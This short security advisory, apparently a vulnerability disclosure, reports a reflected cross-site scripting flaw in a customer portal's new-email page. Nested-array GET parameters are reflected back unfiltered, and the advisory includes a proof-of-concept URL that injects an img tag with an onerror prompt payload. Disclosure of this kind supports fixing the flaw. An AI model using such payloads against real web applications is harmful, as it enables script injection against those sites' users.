The affected resource is:
    /customer/portal/emails/new
	
    All GET parameters are affected by this vulnerability, for example:
    email[body]
    email[subject]
    interaction[email]
    interaction[name]
The application does not filter the parameters if they are passed as nested arrays and reflects its content in the response. Here is a PoC:
⁄customer⁄portal⁄emails⁄new?email[body]=&email[subject][]=asd'>
<img onerror="prompt(1)" src="x" ⁄>&interaction[email]=&interaction[name]=
